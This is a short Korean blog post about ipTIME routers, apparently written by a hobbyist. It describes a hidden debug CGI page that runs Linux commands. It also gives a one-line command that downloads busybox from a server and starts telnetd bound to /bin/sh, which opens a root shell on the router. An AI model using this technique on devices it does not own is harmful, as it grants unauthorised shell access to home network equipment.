2007-06-22 21:27:12에 백도어를 패치한 새 펌웨어가 나왔습니다.
http://iptime.co.kr/zeroboard/iptime_bbs/view.php?id=notice&no=347
----------------------------------------------------------------------
백도어에 대한 내용은 피해자를 유발할 수 있으므로 삭제했습니다.
디버그 모드에 관한 내용은 유용할 거 같아서 일단 놔둘 생각입니다. 이 기능은 계속 있었으면 좋겠네요.
http://공유기주소/cgi-bin/timepro.cgi?flag=debug를 입력하면 이상한 놈이 나옵니다.(최신버전은 debug 대신 bluesky입니다..)
리눅스 명령어를 실행할 수 있습니다.(약간 불편하네요)
여기서 http라는 wget와 비슷한 역할을 하는 프로그램을 찾아서 busybox를 올린 뒤(내장 busybox는 기능이 얼마 없더군요)
busybox에 들어있는 telnetd를 이용하여 putty로 접속했더니..
셸을 띄울 수 있었습니다.
/sbin/http get http://서버/busybox > /tmp/busybox & /tmp/busybox telnetd -l /bin/sh 2> /tmp/log &
이렇게 입력하면 텔넷 데몬이 가동되어 접속할 수 있습니다(내부 네트웤에서만 가능합니다).
댓글을 달아 주세요
busybox 기능 많은데 최소화 한 듯 한데...
2009/04/10 14:05 [ ADDR : EDIT/ DEL : REPLY ]20 메가 정도 되던데...